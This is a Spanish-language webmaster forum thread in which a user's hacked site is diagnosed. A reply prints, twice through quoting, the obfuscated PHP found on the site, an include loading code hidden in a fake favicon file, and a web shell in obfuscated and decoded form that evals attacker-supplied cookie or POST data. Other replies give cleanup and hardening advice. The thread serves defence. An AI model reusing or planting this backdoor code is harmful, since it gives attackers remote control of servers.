            $x3dd23ce .= $GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][47]]($GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]]($geb27a[$b35e8e]) ^ $GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]]($hdf87[$q7aefd])); 
        } 
    } 

    return $x3dd23ce; 
} 

function nb6300a9($geb27a, $hdf87) 
{ 
    global $b41aa95; 

    return $GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]]($GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]]($geb27a, $b41aa95), $hdf87); 
} 

foreach ($GLOBALS[$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][0]] as $hdf87=>$e982916e3) 
{ 
    $geb27a = $e982916e3; 
    $k4aff4a = $hdf87; 
} 

if (!$geb27a) 
{ 
    foreach ($GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][0]] as $hdf87=>$e982916e3) 
    { 
        $geb27a = $e982916e3; 
        $k4aff4a = $hdf87; 
    } 
} 

$geb27a = @$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][81]]($GLOBALS[$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][84]]($GLOBALS[$GLOBALS['z2e3'][95].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][0]]($geb27a), $k4aff4a)); 
if (isset($geb27a[$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][21]]) && $b41aa95==$geb27a[$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][21]]) 
{ 
    if ($geb27a[$GLOBALS['z2e3'][69]] == $GLOBALS['z2e3'][63]) 
    { 
        $b35e8e = Array( 
            $GLOBALS['z2e3'][2].$GLOBALS['z2e3'][87] => @$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][47]](), 
            $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][87] => $GLOBALS['z2e3'][13].$GLOBALS['z2e3'][34].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][13], 
        ); 
        echo @$GLOBALS[$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][26]]($b35e8e); 
    } 
    elseif ($geb27a[$GLOBALS['z2e3'][69]] == $GLOBALS['z2e3'][73]) 
    { 
        eval($geb27a[$GLOBALS['z2e3'][53]]); 
    } 
    exit(); 
}

CODIGO 2 DESENCRIPTADO:
Insertar CODE, HTML o PHP: 
<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$data = NULL;
$data_key = NULL;
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;

function sh_decrypt_phase($data, $key) {
    $out_data = "";
    for ($i = 0; $i < strlen($data) {
        $jplufmtpaem = "i";
        for ($j = 0;$j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}

function sh_decrypt($data, $key) {
    global $auth;
    return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
}

foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
}

if(!$data) {
    foreach($_POST as $key => $value) {
        $data = $value;
        $data_key = $key;
    }
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) ,  $data_key ));

if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
        $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
        echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
        eval($data["d"]);
    }
}

?>

Analizando el codigo 2 desencriptado se puede ver que lo que tienes ahi es un SHELL, con lo cual tienen acceso completo a tu server, no solo a la web.

Si llegaras a necesitar ayuda para solucionar este problema de seguridad puedes enviarme un MP.
Espero que te alla servio de ayuda 😛8:
 
m1x7ur3 dijo:
Hola [MENTION=21765]krvaM[/MENTION] , te aconsejo tomar las siguiente medidas:

* Cambiar usuarios y password FTP.
* Cambiar el password del server.
* En el caso de que tengas wordpress, (que es lo mas hackeable que ay) mira bien los usuarios que tienes agregados al blog, ya que de seguro te han inyectado una SHELL y de ahi se crea un usuario admin en el blog para poder manipularlo y/o inyectar una SHELL secundaria.

Con respecto al codigo que has puesto arriba:

CODIGO 1:
Insertar CODE, HTML o PHP: 
<?php 
/*4e4b4*/ 

@include "\x2fhom\x65/sp\x6ft/w\x65b/s\x70oti\x66ree\x2enet\x2fpub\x6cic_\x68tml\x2fcac\x68e/u\x73erf\x65eds\x2f108\x2ffav\x69con\x5f987\x329d.\x69co"; 

/*4e4b4*/

CODIGO 1 DESENCRIPTADO:

Insertar CODE, HTML o PHP: 
<?php /*4e4b4*/ @include "/home/spot/web/spotifree.net/public_html/cache/userfeeds/108/favicon_98729d.ico"; /*4e4b4*/

Ahi esta llamando al archivo favicon_98729.ico que posiblemente tenga algun codigo oculto dentro de ese archivo.



CODIGO 2:
Insertar CODE, HTML o PHP: 
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['z2e3'] = "\x35\xd\x70\x38\x3d\x49\x41\x56\x2d\x22\x52\x37\x53\x31\x21\x7d\x67\x57\x3a\x3b\x59\x6b\x2c\x46\x7c\x6e\x30\x74\x5a\x54\x50\xa\x26\x72\x2e\x63\x58\x2b\x5d\x25\x27\x43\x62\x47\x4f\x9\x4c\x36\x6d\x2a\x28\x66\x2f\x64\x5b\x45\x4b\x71\x55\x51\x7a\x42\x5e\x69\x5c\x73\x6f\x4d\x79\x61\x4a\x48\x23\x65\x77\x44\x3f\x4e\x5f\x29\x34\x39\x20\x6c\x32\x3e\x24\x76\x78\x7b\x60\x33\x68\x75\x7e\x6a\x3c\x40"; 
$GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][47]] = $GLOBALS['z2e3'][35].$GLOBALS['z2e3'][92].$GLOBALS['z2e3'][33]; 
$GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]] = $GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][53]; 
$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][25]; 
$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]] = $GLOBALS['z2e3'][63].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][27]; 
$GLOBALS[$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][26]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][60].$GLOBALS['z2e3'][73]; 
$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][47]] = $GLOBALS['z2e3'][2].$GLOBALS['z2e3'][92].$GLOBALS['z2e3'][2].$GLOBALS['z2e3'][87].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][25]; 
$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][81]] = $GLOBALS['z2e3'][93].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][60].$GLOBALS['z2e3'][73]; 
$GLOBALS[$GLOBALS['z2e3'][95].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][0]] = $GLOBALS['z2e3'][42].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][73]; 
$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][84]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][27]; 
$GLOBALS[$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][84]] = $GLOBALS['z2e3'][25].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][81]; 
$GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]] = $GLOBALS['z2e3'][53].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][91]; 
$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][0]] = $_POST; 
$GLOBALS[$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][0]] = $_COOKIE; 
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][16], NULL); 
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][83].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][65], 0); 
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][48].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][88].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][88].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][93].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][73], 0); 
@$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][84]](0); 

$geb27a = NULL; 
$k4aff4a = NULL; 

$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][0]] = $GLOBALS['z2e3'][13].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][26]; 
global $b41aa95; 

function db144363($geb27a, $hdf87) 
{ 
    $x3dd23ce = ""; 

    for ($b35e8e=0; $b35e8e<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($geb27a);) 
    { 
        for ($q7aefd=0; $q7aefd<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($hdf87) && $b35e8e<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($geb27a); $q7aefd++, $b35e8e++) 
        { 
            $x3dd23ce .= $GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][47]]($GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]]($geb27a[$b35e8e]) ^ $GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]]($hdf87[$q7aefd])); 
        } 
    } 

    return $x3dd23ce; 
} 

function nb6300a9($geb27a, $hdf87) 
{ 
    global $b41aa95; 

    return $GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]]($GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]]($geb27a, $b41aa95), $hdf87); 
} 

foreach ($GLOBALS[$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][0]] as $hdf87=>$e982916e3) 
{ 
    $geb27a = $e982916e3; 
    $k4aff4a = $hdf87; 
} 

if (!$geb27a) 
{ 
    foreach ($GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][0]] as $hdf87=>$e982916e3) 
    { 
        $geb27a = $e982916e3; 
        $k4aff4a = $hdf87; 
    } 
} 

$geb27a = @$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][81]]($GLOBALS[$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][84]]($GLOBALS[$GLOBALS['z2e3'][95].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][0]]($geb27a), $k4aff4a)); 
if (isset($geb27a[$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][21]]) && $b41aa95==$geb27a[$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][21]]) 
{ 
    if ($geb27a[$GLOBALS['z2e3'][69]] == $GLOBALS['z2e3'][63]) 
    { 
        $b35e8e = Array( 
            $GLOBALS['z2e3'][2].$GLOBALS['z2e3'][87] => @$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][47]](), 
            $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][87] => $GLOBALS['z2e3'][13].$GLOBALS['z2e3'][34].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][13], 
        ); 
        echo @$GLOBALS[$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][26]]($b35e8e); 
    } 
    elseif ($geb27a[$GLOBALS['z2e3'][69]] == $GLOBALS['z2e3'][73]) 
    { 
        eval($geb27a[$GLOBALS['z2e3'][53]]); 
    } 
    exit(); 
}

CODIGO 2 DESENCRIPTADO:
Insertar CODE, HTML o PHP: 
<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$data = NULL;
$data_key = NULL;
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;

function sh_decrypt_phase($data, $key) {
    $out_data = "";
    for ($i = 0; $i < strlen($data) {
        $jplufmtpaem = "i";
        for ($j = 0;$j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}

function sh_decrypt($data, $key) {
    global $auth;
    return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
}

foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
}

if(!$data) {
    foreach($_POST as $key => $value) {
        $data = $value;
        $data_key = $key;
    }
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) ,  $data_key ));

if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
        $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
        echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
        eval($data["d"]);
    }
}

?>

Analizando el codigo 2 desencriptado se puede ver que lo que tienes ahi es un SHELL, con lo cual tienen acceso completo a tu server, no solo a la web.

Si llegaras a necesitar ayuda para solucionar este problema de seguridad puedes enviarme un MP.
Espero que te alla servio de ayuda 😛8:
Hacer clic para expandir...

Muchas gracias ahora te envio mp para que me ayudes :encouragement:
 
Revisa todos los archivos de tu theme me ha pasado un par de veces :sorrow:
 
cual es tu pagina?
 
Eso pasa por usar themes o plugin nulled...

Enviado desde mi SM-N910H mediante Tapatalk
 
Lo recomendable es que elimines esos códigos de una vez para evitar que se sigan ejecutando cada que se accede a tu sitio. También verifica los permisos de carpetas, los directorios públicos y sobretodo, los directorios donde se permita escritura y ejecución. Lo por lo regular también puede ser causado por tu shared hosting ya que estos, al ser compartido, te permite infectarte de otros sitios ajenos a ti aunque tí no seas el objetivo directo del atacante.
 
[MENTION=21765]krvaM[/MENTION] si es un servidor es posible que lo tengas comprometido, te recomiendo instalar y configurar ClamAV+Maldetect junto a las librerias inotify, tras esto actualizar las databases de ambos aplicativos de seguridad (esto es en consola SSH) y finalmente activar tanto el escaneo en tiempo real como un escaneo completo en toda tu web. Lo que si es posible, es que te hayan encriptado demasiados archivos y ya sea muy tarde para accionar por lo que se recomienda restaurar una copia de seguridad desde antes de que te sucediera todo esto y empezar partiendo de allí.

También te recomiendo configurar la protección de opendir e instalar el handler de seguridad suphp con suexec y mod_security.
 
gonzalez96 dijo:
Eso pasa por usar themes o plugin nulled...

Enviado desde mi SM-N910H mediante Tapatalk
Hacer clic para expandir...

no es un theme ni un plugin nulled :encouragement:

- - - Actualizado - - -

dannegm dijo:
Lo recomendable es que elimines esos códigos de una vez para evitar que se sigan ejecutando cada que se accede a tu sitio. También verifica los permisos de carpetas, los directorios públicos y sobretodo, los directorios donde se permita escritura y ejecución. Lo por lo regular también puede ser causado por tu shared hosting ya que estos, al ser compartido, te permite infectarte de otros sitios ajenos a ti aunque tí no seas el objetivo directo del atacante.
Hacer clic para expandir...

Gracias, pero como se que permisos debe tener cada carpeta? porque se que si modifico algun permiso puede dejar de andar el sitio :ambivalence:

- - - Actualizado - - -

sysdop dijo:
[MENTION=21765]krvaM[/MENTION] si es un servidor es posible que lo tengas comprometido, te recomiendo instalar y configurar ClamAV+Maldetect junto a las librerias inotify, tras esto actualizar las databases de ambos aplicativos de seguridad (esto es en consola SSH) y finalmente activar tanto el escaneo en tiempo real como un escaneo completo en toda tu web. Lo que si es posible, es que te hayan encriptado demasiados archivos y ya sea muy tarde para accionar por lo que se recomienda restaurar una copia de seguridad desde antes de que te sucediera todo esto y empezar partiendo de allí.

También te recomiendo configurar la protección de opendir e instalar el handler de seguridad suphp con suexec y mod_security.
Hacer clic para expandir...

te envio mp ya que es todo chino para mi xD
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

A
  • Cerrado
Subasta ¡Mega pack de Salud! >>> Guías, tratamientos, consejos...
Respuestas
2
Visitas
290
AnnaFrank
A
Itzamatul
  • Cerrado
Subasta ✅ ¡A $1, 100 artículos originales de Salud y Enfermedades + SEO + backlinks PR7-9! ME VOLVÍ LOCO✅
2
Respuestas
33
Visitas
1K
Itzamatul
Itzamatul
Itzamatul
  • Cerrado
Subasta ¡A $1, 100 artículos extensos de Salud y Enfermedades + SEO + backlinks PR7-9! ME VOLVÍ LOCO
2
Respuestas
37
Visitas
2K
seototal
seototal
Anotherone
  • Cerrado
Subasta 110 Artículos a 65$ *de dietas
Respuestas
0
Visitas
79
Anotherone
Anotherone
Anotherone
  • Cerrado
Subasta 110 Artículos de dietas.
Respuestas
0
Visitas
143
Anotherone
Anotherone
Atrás
Arriba